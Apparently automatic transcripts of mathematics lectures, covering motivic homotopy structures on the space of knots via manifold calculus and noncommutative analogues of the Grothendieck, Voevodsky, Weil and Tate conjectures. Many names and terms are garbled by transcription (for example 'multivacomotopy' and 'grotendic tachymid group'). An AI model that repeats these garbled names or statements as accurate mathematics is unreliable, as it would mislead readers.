Heessam-Turchin. So maybe first of all, this then quite fit in the framework that I explained in the previous slide, because you have this lower c thing. So it's not quite embeddings, this compact case for the embeddings, but you can adapt the theory of manifold calculus to this. And you can, yeah, the theorem of Dwyer Heessam-Turchin, so they proved it self-independently, that you can understand this approximation, this tk of embeddings in terms of this space here. So omega two, it means twofold book space. But en is my notation for the little n disks operate. Lower than or equal to k means I truncate it up to rtk. So this is the mapping space from the e1 truncated up to ed truncated up to ed. This is a mapping space from the e1 truncated up to oprad, ed truncated up to oprad. Then this map here is given by restriction. And I take the homotopy fiber of that map, and then I take the twofold book space. This looks very, this looks quite complicated and a bit crazy. In fact, if you think about it, well, I'm not going to explain the proof of the theorem, it's quite involved. And if you try to unpack what this right hand side is, you will see that omega two is some sort of homotopy limit. If you pick a presentation of e1, this mapping space, you can view also the homotopy limit of things that are going to be configurations of points in rd. So at the end of the day, if you unpack what this is, this is a big complicated homotopy limit of things that are configurations of points in rd. And if you recall the previous slide, it's also what the tk thing was. It was also some kind of homotopy limit of things that were configurations of points in the target, in this case, the target is rd. So that gives sort of a vague idea for why this theorem is true. So this theorem in particular implies a tk of the meaning space of the book space. Can I ask a silly question? Yes. Roughly speaking, when you're mapping the k to the two, you're just sort of gluing the little intervals in the e1 together along things. Is that the idea? Is that what the two means? You're taking two intervals and then seeing how they glue together? Because you're trying to map a longer and longer piece of the r1. Yeah. I think it's not quite that. Okay. Sorry. It's a bit complicated to explain. Sorry. Okay. Yeah. So the structure of a two-folded space is compatible with connected sum for knots. So I think I have a picture. Here's how connected sum works. So you should have a long knot in rd and another long knot in rd. We can glue them together to get a third knot in rd. That gives the space of embedding the structure of a full loop space, in fact. It's not clear that it's a two-folded space, but at least it's a loop space. And recall that the embedding space maps to each of the tk of the embedding space. The two loop space fractures are compatible. Okay. So this good old device, this good device tower, this many four-calculus tower is related to the theory of finite type invariant for knots. So let me explain quickly what this is. This is a definition that was due to Vasiliyov and Goussarov. So what is, so definition is what is a, a negative invariant of degree at most k for knots. So it will be a map from the set of knots by zero of the space of embeddings to an obedient group A, which is a monoid homomorphism. So this has a monoid structure given by connected sum and which is invariant to their infection by pure grades lying in the k plus one term in the lower central series of the pure grade group. So that's, that's how the, this lower central series that appeared in the, in the theory of motives here also appears in the theory of knots. So what do I mean by infection by pure bread? Here's a picture. So here's, here's a knot. And inside is not well inside is box. So it's like a three ball in my, in my R three. And the intersection of my notes with this free ball is a trivial braid with three strands. And I can, now I can pick any other to read with three strands and replace what's in that box by my pure grade. And this gives me a different knot. So that's what I call infection, infection of the knot by, by a pure braid. And so, yeah, an invariant of degree at most k will not see the difference between this knot and this knot if the braid that you used is in this terms of lower central series. So the higher case, the more the finer is invariant is. And there's a conjecture, which is in, I think in this precise form is a first, I print a paper by Bonnie Conant, coach, and seen how the conjecture that the map from pie zero of the embedding space to the K plus first term, the device tower is the universal additive invariant of degree at most k. So universal means it's the initial object in the category of additive invariance. Any other additive invariant was factor to this one. So what's known about this conjecture that it's true after considering with Q, that's essentially you could to conceive it's a, it's a construction called conservation to go. And then it's a question of which in her thesis has shown that it's, that this map is your objective, which means this implies that maybe it's not the universal additive invariant, but at least it's a quotient of the universal additive invariant of degree at most k. Okay, so now I can give a precise formulation of my, the main theorem I had at the beginning. So now I had this. So G is a collection equal to three K is any integer, at least case, at least two, and it could be infinity. And I can look at this homotopy fiber. So this mapping space from credit operand to this. So recall from the previous slide, if I take a twofold loops on this, this gives me the case term in the good device tower that approximates a space of knots. So yeah, so that's, that's a twofold looping of the case case stage of the tower. So that's actually a simply connected space. And the theorem is that this has a structure of a non trivial material to protect. So now since it's simply connected, I don't have to worry about pi one. So this is really the definition I've given at the beginning. So in particular, the homotopy groups of this good device approximation, not just by zero, but all homotopy groups are going to have a structure of a derivative. And, and when there's at least four, then we have this good, really client conversion theorem that says that the limit of the good device tower actually computes a space of embeddings. So then we have a statement about the actual homotopy groups of the embedding space. So yeah, the important part in this theorem is a word non trivial, because you could, there is, you can always give a sort of stupid material structure to a new homotopy type where, well, essentially, essentially a material type you can think of as homotopy type with an action of some complete group and you can, you can give a trivial, trivial action. So here what's important is that it's non trivial and we can actually deduce stuff from this non triviality. This space is connected, as I said, I can give a very quick sketch of proof. So we can start with, so the input we need is the structure of a multivacomotopy type on the operator E2. So here we have to use non simply connected spaces because it's already to the spaces that that appear in this opportunity to not simply connected. So we have to do a detour through non simply connected spaces and build a statement of the theorem is, is a pretty simple connected theorem. And then we use a result due to Jacob Dury called additivity for the little d-disk operator. We can write the little d-disk operator as E2 times EG-2. And what you do is, well, you give EG-2 the stupid multivacomotor and you give it to its non trivial one. So I'm going to explain in a second where it comes from. And the point is that the map, well, if you pick a map from E1 to EG, that will also factor through the EG-2 part, the one that is trivial. This will be, well, this space will have a multivacomotopy type structure and this will preserve the base point and here as well. So these two spaces will be pointed and multivacomotopy types and then the homotopy fiber will have to inherit a pointed multivacomotopy type structure. Okay, so the only thing I have to explain is where does the multivacomotopy type structure on E2 comes from. But I realize I only have five minutes left. So maybe let me explain this very quickly. So essentially, as you, as always, there is a rational part on the PoP, P-complete part, which prime. So rational part actually it comes from the fact that the rationalized little to disk operator has an action of the group called the grotendic tachymid group. And this grotendic tachymid group receives the map from IU's multivacalra group. So to the rationalized little to disk operator has an action of IU's multivacalra group. And that's how you can, you can, you can do the rational part of this story. The P-complete part is similarly there is a there is a PoP grotendic tachymid group and the P-complete little to disk operator has an action of this PoP grotendic tachymid group. So these two results are essentially due to Drainfield and they were put in, so in the homotipical context, the rational situation is due to Fress and in the P-complete case it was a paper that I wrote. So we have this action of the PoP grotendic tachymid group and the P-complete little to disk operator. And there is a map of profiled group from the absolute grotendic group of Q2 is P-completed grotendic tachymid group to SP PoP grotendic tachymid groups. That's how you construct the Galov action. These two pieces of data are compatible. That's what gives a motivic homotopy, the structure of a motivic homotopy type. There is a second approach that is, that comes from recent work of Dimitri Vintrob. He actually has an algebra geometric model for the little to disk operator using a log scheme. I'm not going to explain this. Okay, so we have this motivic homotopy, the structure of a motivic homotopy type on the space of knots or maybe on this good device approximation, the case of knots in R3. Okay, so what can we use this for? So one theorem we can deduce from this is it's a partial answer to this conjecture. So recall, there was this conjecture that I mentioned that the good device tower produces a universal additive invariant for knots. And so it's trying to work with Pedro Boeveda. We can prove that this is true. So the map to a k plus first stage of the good device tower is the universal additive invariant of degree at this k after inverting prime numbers. If you invert small prime numbers, sorry, this end here should be k. If you invert small prime numbers with respect to k, this is true. So the larger ks, the more prime numbers you have to invert. So that's a theorem that we prove using this motivic structure. And truly the idea is this good device tower, so we have this good device tower that computes the homotopy type of the space of knots. And this tower induces a spectral sequence that tries to compute the homotopy groups of the limit of the tower. And using the point is since now this tower has this extra data, it's a motivic homotopy type, the spectral sequence has some more algebraic data. The differentials, it puts out the restrictions on the differentials in the spectral sequence because they have to be compatible with this data. And this forces many differentials to be zero. And then we use, we have to use the work in Denitsakosanovich thesis where she proves that if you know that this good device spectral sequence collapses, this implies that this implies a positive answer to this conjecture. So the fact that k plus first state of the device tower is universal, even brand of DPR-MOSK. And I think I'm out of time. So maybe I'll just say, you can also compute higher homotopy groups in a range of degree using this kind of data. And that's it. Thank you. Okay, many thanks indeed. Any questions or comments? Yes, so I have a question. So is it possible that you could still lift this motivic homotopy type to a homotopy type in say, I don't know, SH of k or something like that? Or is it completely out of? I think SH is fine. I mean, I think that no one has really written the details of this, but everything I've explained with GA, you could do is SH instead. But you really want these two gluing parts, some some periodic thing and some, that's it. I mean, in some sense, this is not a very good definition. It looks a bit ad hoc. Yeah, but okay. Yeah, essentially, the idea of motivic homotopy type is trying to capture as much as possible from like as much unstable data as possible from stable information. So that's the idea of this motivic homotopy type. And the Galois action is really used, for example, for the vis vanishing of differentials that you mentioned. Yeah, in fact, you don't need the full really, it's just theorem is just a theorem about the P complete part of this data. So it's just a theorem about the Galois action. I mean, that's how we wrote it in our in our paper. But I think it's cool to have a full structure. Other questions? Seems that we don't have any other questions. And let's thank Zafra again. Thank you very much.
|
The pure braid group is the fundamental group of the space of configurations of points in the complex plane. This topological space is the Betti realization of a scheme defined over the integers. It follows, by work initiated by Deligne and Goncharov, that the pronilpotent completion of the pure braid group is a motive over the integers (what this means precisely is that the Hopf algebra of functions on that group can be promoted to a Hopf algebra in an abelian category of motives over the integers). I will explain a partly conjectural extension of that story from braids to knots. The replacement of the lower central series of the pure braid group is the so-called Vassiliev filtration on knots. The proposed strategy to construct the desired motivic structure relies on the technology of manifold calculus of Goodwillie and Weiss.
|
10.5446/50934 (DOI)
|
Thank you so much. I would like to start by thanking Paul, Grigory, Frédéric and Arnevint for the invitation to give this course. I would like to start, I would like also to thank the ASHOES for being so accommodating throughout this academic year, in particular for setting this machinery that allows me to use this old school technology called Blackboard. And I would also like to thank the audience here for making the talk a little bit more human. So the course we'll have consists on three lectures. The first lecture will be about some celebrated conjectures and about their non-commutative. So I will always use this notation Nc for non-commutative, non-commutative counterparts of these conjectures. Then in the second lecture I'll be talking about implications of this non-commutative viewpoint on these conjectures to non-commutative geometry. And then in the final lecture, so this will be on Wednesday and then on Thursday I will talk about applications to classical job of this non-commutative viewpoint on these conjectures. So let me start with some notations. So throughout the course, little k will be always a perfect field of characteristic p, p greater or equal than zero. And in the case where p is positive, I will write wk for the ring of pt pic of its vectors. And capital K for its fraction field. So I need to invert p. So for example, if this is fp, then this is just a ring of p-adic integers and this is the ring of p-adic numbers. And then I will also write by sigma the isomorphism on capital K induced by the Frobenius on little k. So here I raise to the pth power that gives me rise to an isomorphism which I will write by sigma. And let's start with the scheme which I will assume to be smooth and proper k-scheme and of dimension d. Okay, so these conjectures are almost all of them about algebraic cycles. So let me say something about algebraic cycles. So we can consider this graded q vector space where it's graded by the dimension. So I look at algebraic cycles of two dimension i or x with rational predictions. And then if we choose to consider one algebraic cycle, we can impose several different equivalence relations in here because this is a huge graded q vector space. So there are a lot of different equivalence relations. For example, the rational equivalence. So rational equivalence says that if you have an algebraic cycle, it's rationally equivalent to zero by definition if there exists an algebraic cycle beta in the product of x with a projective line in such a way that your algebraic cycle is the difference from the evaluation of beta and on the infinite. So intuitively speaking, it says that two algebraic cycles will be rationally equivalent if you can deform one into the other using the projective line. Then there is another equivalence relation called new potency equivalence. So here you say that an algebraic cycle is new potently trivial by definition if there exists an integer in such a way that when you cross your algebraic cycle with itself a certain number of times. So let's say cross it n times. So this is an algebraic cycle in co-dimensional i on x, but on x cross with itself n times that this algebraic cycle here, it's actually rationally equivalent to zero. So if there exists an integer such that the cycle disappears, you'll say that it's new potency. So Gonzalo, can you really write really bigger because it seems that there are several, yeah really bigger, two times more maybe because there are several people complaining. And then there is a homological equivalence. So here you choose a veil homology theory. So there are a lot of veil homology theories. I'm going to consider for our purposes solely the RAM homology theory in characteristic zero and in characteristic p crystalline homology theory. And then so any veil homology theory comes equipped with comes equipped with a cycle class map. So we have a cycle class map towards the homology to ix twisted by i. And then you say that your algebraic cycle, so you can say it here, it is homologically equivalent to zero if it disappears when you're after applying the cycle class map. Okay. And then another interesting equivalence relation. It's the numerical equivalence relation. So here you look at algebraic cycles of co-dimension i with q coefficients and up to rational equivalence. And you can pair them with algebraic cycles of complementary co-dimension. And from here you can extract a rational number. So you if you have two algebraic cycles alpha and beta, what you can do is that you can intersect them. So this will give you a cycle of degree zero. And then you can simply take the degree of this. And so let's write this pairing by alpha, beta. Okay. And you say that a cycle is numerically equivalent to zero if by definition this pairing vanishes for every pattern. Okay. So we have these four difference equivalence relations on algebraic cycles. And the remark is that well if you have a cycle which is rational equivalent to zero then it is a new potently equivalent to zero. And then it is homologically equivalent to zero. And it is necessarily numerically equivalent to zero. So that implies that at the level of algebraic cycles you have all these quotients. You have these quotients on algebraic cycles when you impose these different equivalence relations. And the interesting point here is that when you impose this discussion here at the very end you get something which is finite dimensional. But here not necessarily is something finite dimensional. It can be very big. For example, there is this famous result of Mufford that if the field, the base field is large, for example, if you are overseas then if you take a surface with positive genus then necessarily your necessarily your algebraic cycles of co-dimension two in your surface the dimension is actually infinite. So this is pretty large depending on the base field and this is always finite dimension. And now there are a lot of conjectures about these different significance relations. So one of them is this famous conjecture of Grottendijk. The Grottendijk standard conjecture of type D. So it's a conjecture from the 60s. That says the following. So you feel... So Gonsalo, maybe there's a question that you could answer. So for all, I just read. So someone is confused because he asked all the relations are with rational coefficients. Yes, I'm working with rational coefficients. Yes, it's not mandatory that but in my particular talk I'm doing that and it will become clear why in a minute by the end of the talk it will become clear. Yes. Also there's a question about the fact that you start in characteristic P but you seems to work overseas. I'm working in characteristic P but my P is greater or equal than zero. Okay, can be zero. Okay. Yes. There is an algebraic equation. There is, there is but I'm not on the board. I ignore it. There is also and it will be something that will be seated here. Yes. Because algebraic equations will imply the numerically. Yes. Yes. Yes. This conjecture simply says that algebraic cycles up to homological equivalents or algebraic cycles up to the numerical equivalents are the same. So it's saying that there is no difference between these two. So that's a conjecture from the six. This is still wide open. Well, there have been a lot of people working on this. For example, is known when the case where these dimensionless are equal than two and in characteristic zero even of the national lesson or equal than four and even for a building varieties in characteristic zero and these are results of Lieberman some old results and there are many other cases. Then a conjecture of Voivotsky called the Voivotsky-Newportons conjecture. So it's a conjecture from the nineties. It says that that algebraic cycles up to newportons equivalents relation are the same as algebraic cycles up to the numerical equivalents relation. So you are imposing here an equality between these two. So in particular, these two will become also equal. In other words, a remark is that this conjecture actually implies the Grottenich conjecture and it's interesting in the sense that it does not depend on any variable multi theory and this is still of course wide open. It's known in particular cases. For example, when the dimension of X is less or equal than two, this is an independent result of Voivotsky and Claverson. Then there is also a conjecture of Dalynsen from the eighties that says that if I'm over a finite field, then in fact this conjecture says that there is no difference between algebraic cycles up to rational equivalents and algebraic cycles up to numerical equivalents. So in other words, all the difference equivalents relations are the same if you are over a finite field. And again, this is wide open is known in some cases, for example, for curves that thanks to the work of Soulet and Bruno Kahn, etc. And of course, this Dalynsen conjecture implies the Voivotsky conjecture. So these are three conjectures about these difference equivalents relations. Then another conjecture I wanted to talk about is this famous veil conjecture. This is from the forties. So it's assertive following. So we are working over a finite field. Okay. We are working over a finite field and choose an integer between zero and twice the dimension and can look at for the crystalline homology of your algebraic variety. Okay. And then this comes equipped with an action of the Frobenius. So here I have a finite dimensional capital K vector space equipped with an automorphism. And the conjecture is says the following says that if you have lambda is an eigenvalue of this operator of the Frobenius, then this satisfies two conditions. First of all, it's an algebraic number. And secondly, it's absolute value, it's complex absolute value is equal to q omega over two. And these four all possible conjugates of left. So in fact, this conjecture was of course in the forties, there was no crystalline homology. So it was not phrased like this, but it turns out to be an equivalent formulation. And it was proven, it's now a theorem, it was proven by the link that this conjecture holds. Okay. And let me say again, an interesting fact is that, well, suppose that we still didn't have the link's work, but it turns out that if your eigenvalue is an algebraic integer, if we knew that it would be an algebraic integer, then it turns out that also, so here the absolute, the Atlantic absolute value of lambda is equal to one for all conjugates of lambda and this for every L different from P, the characteristic of our base field. Okay, of course, the links result implies in particular that these numbers are in fact algebraic integers. And so we know this fact. Okay, and this motivates the study of the Asevale zeta function. So let me recall you. So the Asevale zeta function is defined as follows. So you take this product over all the close points of your, of your skin and you take one over one minus q degree of x minus s. So it's a complex valued function. So this product converges when the real part of s is greater than d, greater than the dimension. So we have s. And now if we use, if you combine the result of the link with some work of Bertolot and crystalline homology, we can rewrite this function. So let me just mention you that this number that it's here is actually the cardinality of the residue field of the point, which is a finite field. So this is what you are counting the number of points on this residue fields for all those points of your skin. And so as I was saying, if you combine the link's work with the work of Bertolot and crystalline homology, you have a homological interpretation of this function. You can write it at least, this product between zero and twice the dimension of the determinant of identity minus q minus s for Venus acting on the crystalline homology of x and then minus one power omega plus one. So this in particular tells you that this function that is defined here, so let me, so let's say we are over c. So we have our function. So we know that it's, so we know that it's defined on the south plane. So it's well defined on the south plane. It actually extends to a unique meromorphic continuation to the entire complex plane. This is what it tells you that. And moreover, the link's conjecture is going to tell you where the zeroes and the poles of this function where they are. So you can look, you see that in fact on these regions in red, this is precisely the places so where you have the poles in these regions in red. So you don't know where they are, but they will leave in these vertical lines. And in these regions in blue, these are precisely the regions where the zeroes will occur. So here you'll have the zeroes of this function. You don't know where they are. And you also observe that since this function is defined using complex conjugation, so you know that it will be periodic of period 2 pi i over the log of q. So you'll have a periodicity on this function like this. This is simply due to the fact that you are using, you have this shortest x sequence where you have 2 pi i log q z. So you have this shortest x sequence where you use, when you use complex exponentiation. So you have this periodicity. And then finally, I would like to mention one final conjecture, which is also a famous conjecture of Tate. So it's a conjecture from the 60s. It says the following. So here I will be over the finite field again. And the conjecture, we are in fact three of them, three versions. So you have one version for L prime difference from P. So here what you say is that you have the cycle class map going to the etal, the erratic homology, going to erratic homology. And these elements, in fact, they land in those elements that are fixed under the action of the absolute color group. And the conjecture, it says that, well, if you change from q-quefficient to q-l-quefficient, then this cycle class map becomes surjective. So any class invariant and then absolute color group comes from here itself. Then there is also a P version of this. So you do the same, but now you use crystalline homology. So you use crystalline homology. And you look here at the crystalline Frobenius. So these elements will land in those that are stable, that are fixed under the crystalline Frobenius. And when you change from q- to q-p, then this becomes surjective. That's the conjecture. And also there is a strong form of the conjecture which says the following. It says that, well, here, as I was mentioning, we don't know, we know that the poles live in these red vertical arrows, but we don't know where they are exactly. And this conjecture tells you that, well, there are poles, this function as poles precisely at this point, i. So there are poles in here. So here there is a pole, here there is a pole, here there is a pole, etc. And of course, because of the periodicity, then you would have infinite poles living here, etc. And moreover, it's going to tell you that, well, not only you have poles there, but the order of the pole is given by this precise number. So it's equal to the dimension of the algebraic cycles with q-peficients, but up to numerical equivalence relation. So the dimension of this q-vector space is actually the order of the pole at this precise point. And, well, and we impose this for every i between zero and the dimension. That is for all these i's. And as you see here, it's called strong-tate, because it's actually stronger than the classical-tate conjecture. So it's a theorem of tate that, in fact, the strong-tate conjecture, well, implies the classical-tate conjecture, actually for every l different from p. And moreover, if you impose the conjecture dlx, this grotten-dick conjecture, then it turns out that the converse also holds, so it becomes an equivalence. And this is also true if you have for the conjecture within the p-version of the conjecture. Okay, so these are the conjectures that I would like to establish non-commutative counterparts of. Okay, and, well, of course, let me say these conjectures are wide open in general. It's known in very particular cases. Tate-proof it in the case of curves. Nowadays, a lot of people were able to prove it in the case of k-3 surfaces. Okay, so now let me, just before finishing this commutative part, let me just mention something really quick. Let me just mention here that this function, this very interesting function also admits this function, admits a functional equation. And this is a theorem of art in and grotten-dick. So in this function, you have this relation between, you can relate the function at s with the function at s minus or d minus s. And the relation between the two is given by this. So here you have the Euler characteristic of your scheme s. And here you have a constant, which is minus the Euler characteristic, the dimension divided by two. Okay, so it's about that function over there. Okay, so this is what I wanted to say about the commutative world. Now, let's move on. So what do I mean by non-commutative geometry? So there are different people look at non-commutative geometry in a different way. Okay. And so for me, non-commutative geometry will be actually non-commutative algebraic geometry. Okay. So which is a subject that goes back to the Moscow school, let's say, goes back to Manin and its students, etc. So the idea that we put these words, so there is this standard definition of Bondow and Kapranov, that what is a differential graded category, so a DG category. So this is simply a category A, which is enriched over complexes of K vector spaces. Okay. So the home spaces are just complexes, not ordinary sets. And you have a lot of examples whenever you have an algebra differential graded algebra, then you have one of those, which is just one of those with the simple objects, with the single objects. And whenever you have a scheme, then you can look also at this category of perfect complexes on your scheme. So these are complexes of OX modules that locally are quite asomorphic to bounded complexes of vector bundles. And then this carries a canonical DG enhancement. So these are two examples. So algebra and geometry both give rise to DG categories. And this very famous example of Williamson says the following. So if you look at the projective line and you look at modules over the projective line, that category is very far from modules over an algebra. But if you go towards this drive setting, then this category is actually more equally equivalent to an algebra, and you have this algebra of matrices. So in other words, this is telling you that the projective space in this drive setting, it's actually a fine is given by an algebra, but by a non-commutative algebra. And then in this world, there is this notion of smoothness and properness. So this is good to maximum. So if you have a DG category, you call it smooth. So by definition, this is just saying that when you look to it as a bimodule over itself, then that it's compact in the category in the drive category of a bimodule. And proper simply means that well, if you fix two objects, any two objects of your category, that's a complex, you look at the cohomology, and you ask this dimension of this cohomology to be finite dimensional, and moreover, that the total cohomology to be finite dimensional. And this for any two objects, x and y. Say it again. Yeah, I'm working over a base field, it's always our little case. It can be more general, you can work over a commutative ring or even over a different base, it can be very general. And then the key remark is that if you have a scheme which is smooth and proper, then that implies that well, this category, it's actually smooth and proper in this sense. And also the converse holes. So this perfect complexes on a scheme actually reflects these properties of smoothness and properness. And so the idea here, it's now, we would like to do geometry, not with the skin, but with an arbitrary dg category, a smooth and proper one, which mimics smooth and proper schemes. So what can be done in that case? So in particular for this course, I would like to phrase, to formulate the non-commutative counterparts of all these conjectures. So if we want to do that, in particular, I would like to have some kind of non-commutative valcomology theory. So something that works not just for schemes, but in full generality. So for this, let me talk about a topological periodic cyclic homology. So this, let me put some names on the board. So this to Alencon and many others, these two, Essofold, Tuschels and many others. So let me give you an idea of this. So I suggest to look at the course of Tina last week and also of Kaledin, if you want to learn more about these things. So let's suppose to simplify that I just have an algebra, an ordinary algebra with A. What can I do? I can do the following. I can do the following construction. I can look at A, A cross with itself over the base field, A cross with itself, cross with itself over the base field. And now I can use the multiplication to define maps. I can multiply these two, that gives me a map, but I can multiply by this order that gives me a different map. So it's not necessarily commutative algebra. And here also I can multiply these two or these two or even these two. So and in fact, I get this simple initial gadget and I can totalize it. And if you totalize it, you get something that is called a Uschild homology of A. And that is something that is K-linear. So for example, the Uschild homology of our base field is actually the base field itself. And now you see that at every level what you can do, you have an action, you can promote the factors in the C-click order. So if you put that information all together, that gives you an action of the circle. So you have an action of the circle on this object. So you can do a take construction. And if you do this take construction, what you end up is that with the periodic cyclical homology of A. And this again is something that is linear, but it's more than that. It's actually periodic. So for example, if you computed over the base field, that's a ring of polynomials on one variable, of low-run polynomials on one variable, of variable being a minus 2, of degree minus 2. So you get something periodic, too periodic. So Gonzalo, there's a question, maybe I've missed it. Is there a way to define a smooth and proper relatively? So if I have a map of DG categories, I can define a smooth proper morphism. Yes, there is. I don't remember from the top of my head, but yeah, there is. And that it's also in the literature. I can dig in and then forward the definition. Yes, there is a relative setting here. And now what I want to consider is let's go to, this is an arbitrary characteristic. Let's go to characteristic P, positive characteristic. Okay. Now in positive characteristic, I can do this topological version of periodic cyclical homology. And roughly speaking, what I do is that I change the base field. And now I do tensor products over the sphere spectrum. Okay, so I get the base, which is even more initial than the original one. And I can totalize this construction and get something which is a topological version of the social homology, which is still something k linear. So if you take the thh of little k, that's a result of Boxsted. So this is a ring of polynomials on one variable of degree 2. Okay. But then it turns out that there is a relation between the two. This is actually a module over this. And so one thing that you can do is that you can take the tensor product over k. So in other words, you can think about this as one parameter deformation of official homology on this parameter here. So when you take the fiber at zero, you get the original ocean homology. That's one way to think about it. And then here you can mimic. So again, you have actions of the cyclic groups, these permutations, if you put them all together, that gives you an action of the circle. And you can do a take construction in this topological sense that's called Greenleys construction. And you get this topological version, which now no longer is k linear. So for example, when you compute it over the base field, what you get is the ring of vectors where you have added one variable of degree minus 2. So you see that from this computation and this, you see that this one is actually a characteristic zero lifting of this one. Because if you reduce mod p, the vectors you end up with your base field. And this is true in general. In fact, this is a characteristic zero lifting of the periodic cyclical model. And now here you can do something that you cannot do in algebra, which is I can invert p. And that will be important for us. Because if I can invert p, then a new feature appears here in the topological world that does not exist in the algebraic world. And this new feature is this cyclotomic Frobenius. So again, I mean a positive characteristic. So let me mention what I'm going to say. It's in this topological language, but this is originally defined by Kaledin. So Kaledin is the first person that actually make this rigorous. So let me just make a remark. Suppose that you have a commutative algebra. Okay, so if you have a commutative algebra k algebra and over a field of characteristic zero, then what you know is that these two relations hold. So if you do a plus b for any two elements, that's a p plus b p. And the product is also a p times b p. But now if you if you are no longer working with commutative gadgets, then these things don't hold. So you don't actually have a Frobenius. But the Frobenius will appear not on the algebra itself, but will appear in this realization in this. So if you have a if you have a smooth proper, smooth proper dg category, then you can look at its thh of a. And this thh of a, it's actually something called the cyclotomic spectrum, in the sense that it doesn't not only it has this circle action that I've used here, not only have this circle action that you use to define the tp, but moreover, as this map that goes from thh from a to the thh of a and the take construction with respect to the cyclic group of order p. There's a question, Monsalor. So what about the definition of tp of k and characteristic zero? Yes, how we define it. Yeah, I mean, we can do that similarly, but I'm just focusing in characteristic zero for for. But are we defining what about with the are we defining zero zero typical v vectors just to be k itself or? No, no, I'm just I just want to work here in the case when I'm working with topological. So, okay, I'm just working in characteristic zero. Okay. And so here I want I have this map, which is s one equivalent. So here we have an action of s one and here you have a residual action of s one also, or if you want to s one module, the cp that identifies with s one. And so it's this two data is called the cyclotomic spectrum. I mean, it's more general, but I'm over p. And then out of this data, what you can do is you look at thh of a and then you look at thh of a and then so you have a what you can do here is that you have a canonical map from the homotopy fixed points of the circle action to the take construction. You have a canonical map here. And this take construction is what we call the pp of a and moreover, it turns out that in this setting. So if you are working with the smooth proper digi category, it turns out that this is similar to the thh of a where you have the take construction of cp and then you take the a multiple before fixed points with respect to s one. So it's a technical result. You have this equality, but that implies that you have another map here. So you take this original map and you take the multiple fixed points with respect to s one. And now you have these two maps and it turns out that the kernel of the canonical map as a scale linear. So if I invert p that kernel disappears. In other words, this map here becomes an isomorphism. So if it becomes an isomorphism, then I can define a cyclotomic Frobenius here, which is simply you take this map and you compose with the inverse of the canonical map. And that gives you a Frobenius from tp one over p if you invert p to tp of a where you inverted p and moreover this map is an isomorphism. So the Frobenius exists here after inverting p, but it doesn't exist originally in contrast with the commutative world. It doesn't exist on the algebra itself only on the invariant. And let me make some remarks about this cyclotomic Frobenius. So first of all, it is not linear. So it's not a z2 graded map. So it's not linear here. So in contrast, you only have this relation when you change from n to n minus two. So these are equal up to this multiplication by one over p. And and moreover, these maps that you have, they are not as in commutative geometry, they are not capital K linear. They are only sigma semi linear. Okay, so in particular, if you if you are working over a finite field, one thing that you can do is to compose and get the actually K linear maps. So you simply compose the phi n r times that gives you something which is K linear. And then the relation between these different Frobenius when you change from n to the Frobenius n minus two, it's actually multiplication by one over q. Consalos, so there is a question. Don't we need something like K being perfect for Frobenius to be an equivalent? So it comes, everything comes from my assumptions on A being smooth and proper. This will imply the equivalence on the Frobenius. Okay, so now this suggests that, well, these are, you should think about periodic cyclical homology and topological Schiller homology as non commutative well conjectures. So that's what we are going to replace actually the the ram homology and the crystalline homology. But there is something that we can do something. We can do the following. You can let me just write on the side. Can you leave the blackboard? Oh, yeah, of course. Sorry. So let me just write an aside here about non commutative what you think realizations. So when we wonder, well, we can maybe extend all the commutative results to the non commutative results. And there is this result saying that well, you can look at smooth schemes. And you can go to Morale-Weyvotsky stable or multi-peak category stable A1 or multi-peak category of schemes. And then on the non commutative side, you have DG categories. And we can construct a non commutative version of this Morale-Weyvotsky category. So I'm not going to define this in this course. It's just an aside. I'm just telling you an aside. And these things are related because if you have a scheme, you can pass to the perfect complexes. And then we would like to relate the two. So here the relation is as follows. Here we have a motivic spectrum that represents a multi-peak theory. So we can look at modules over the KGL with quick coefficients. And then you see here, this is a covariant procedure. And this is a contravariant procedure. This is contravariant. So we need a duality. So we can dualize here. And then it turns out that there exists a functor here, which has a lot of good properties. It is fully faithful. It is a tensor functor. And it admits even a right adjoint. And then as a consequence of that, as a consequence of this breach between the commutative and the non commutative world in this setting, we have the following corollary. So we can do the following. Suppose that you have a realization that you'd like to be interested in. So here you have Morale, you have Wewocki category of geometric motives, and you have a realization. And what you can do, you can pre-compose with duality. So let's say that we are with quick coefficients. We can pre-compose with duality and then go to schemes. So we have this contravariant functor on schemes. And then I can modify this realization. So here I have a tight object, which is nothing but this one. And then I can somehow trivialize it by considering modules over this sum, over all possible powers of RT. So I get a modified realization. And it turns out that if I do this modified realization, when you pass from schemes to DG categories in this sense, then all these kind of modified realizations, they can be extended to the non commutative world. So you get, there exists a non commutative version of the realization. So in particular, you get this result, it gives rise to a lot of non commutative motive realizations. For example, an adic version, an odd version, a Durand-Betti version that, for example, can lead you to define what are non commutative periods, etc. And how is this corollary obtained? Well, this corollary is obtained as follows. Let me just explain this. So you have, you can do exactly the same thing in here. But instead of KGL, you can use the spectrum that represents motivic homology. Okay. You can do exactly the same thing. So I'm going to, sorry, I need some space. I'm going to erase the corollary. But so I just want to have this realization and I want to extend it to the non commutative world. And let me do it here. So you'll do exactly the same. And now the first point is that, well, this is DM, the big DM, this is a result of Rondings and Polk, post-vener. And so this composition is your motivic realization, map of Vybocki. So here you have your realization going towards your key. And the second observation is that the KGL with QP-efficient is actually this trivialization. So you get this by M to N. So you have this fact here. And so this is simply telling you that you can base change here from coefficients on the motivic homology to KGL. And then you can do the same thing on the target. So if you do the same thing on the target, you can simply look at modules on the sum of your realization of your date motive. And you get this induced map here. And so your non commutative extension, it's actually we use this functor. And then what you do is that you use the joint and then you use this induced map. And that is your way to extend any kind of realization as long as you modify it, then it can be extended to the setting. Of course, this is a bit is cheating, right? Because you are defining this using schemes. You are just using an adjoint. You are just building this functor using schemes. You look at the closest scheme associated to your non commutative motive and apply the classical invariant. So it has a lot of problems. For example, these things are not monoidal. For example, you don't have finiteness on this. So it shouldn't actually be called a realization. But it's something that it can be done. You can always extend anything in the commutative world to the non commutative world via this adjoint. It's a bit cheating. Okay, so now we are ready to come back to our original goal. And now we can actually formulate all the conjectures. And so, yeah. Yes. Yes. No, I'm getting, you have some kind of, I'm just saying that you suppose that you have a suppose that you have a realization. So it's this, so this map, this realization. And then as soon as you modify it in the sense that you trivialize the type motive, then you can extend it to any DG category by via this procedure. But of course, this is using an adjoint. So it's not a correct way to do it. What you want to do is to have an intrinsic definition that is not using actual schemes, right? Monsalou, what was the question? We did not. It was just to explain a little bit better the board. Okay. Okay, so now what's the replacement of algebraic cycles? It's the grotendic group. So now I have a smooth and proper k-linear DG category. And we look at its k0. Well, its k0 is just a k0 of its drive category, which is a triangulated category. Okay. And now we choose an element in here in the k0, and we can phrase all the similar equivalence relations. We can say, we can talk about new potents equivalence. 